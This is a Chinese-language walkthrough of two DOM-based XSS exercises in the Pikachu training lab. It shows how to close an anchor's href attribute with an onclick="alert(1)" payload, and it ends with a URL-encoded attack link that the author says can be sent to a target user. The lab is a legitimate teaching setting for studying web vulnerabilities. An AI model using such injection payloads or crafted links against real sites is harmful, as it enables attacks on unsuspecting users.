3.XSS-DOM型（基础和进阶）

DOM XSS（基础）

不与后台服务器产生数据交互,通过前端的dom节点形成的XSS漏洞。
进行测试一下，输入111，会显示what do you see

查看元素代码，看到What do you see

根据前端页面语句进行编写弹窗攻击代码

<a href='"+str+"'>what do you see?</a>
"+str+"去掉，进行将href闭合语句编写
<a href='#' οnclick="alert(1)">'>what do you see?</a>
将如下编写好的语句进行输入搜索框中
#' οnclick="alert(1)">

粘贴到搜索框中，点击clikc me
在点击what do you see?就会弹出一个窗口，但是刷新一下就没有了
前端的输入被DOM获取到了，通过DOM又在前端输出了，但是URL中不存在攻击类型的编码

DOM XSS（进阶）

DOM型xss-x
测试一下，在搜索框中输入123

查看页面元素代码

同样和基础型dom一样的编码构造弹窗攻击代码语句

<a href='"+xss+"'>就让往事都随风,都随风吧</a>
"+str+"去掉，进行将href闭合语句编写
<a href='#' οnclick="alert(1)">'>就让往事都随风,都随风吧</a>
将如下编写好的语句进行输入搜索框中
#' οnclick="alert(1)">

粘贴到搜索框中，点击说出你的伤心往事
在点击有些事。。。，在点击就让往事。。。就会弹出一个窗口，但是刷新一下就没有了
前端的输入被DOM获取到了，通过DOM又在前端输出了，但是URL中存在攻击类型的编码，将url链接发给要攻击的用户即可

将上面的url复制在谷歌浏览器上访问即可，存在dom型漏洞

http://www.pikachu.net/vul/xss/xss_dom_x.php?text=%23%27+onclick%3D%22alert%281%29%22%3E#

上面域名后面的

text=%23%27+onclick%3D%22alert%281%29%22%3E#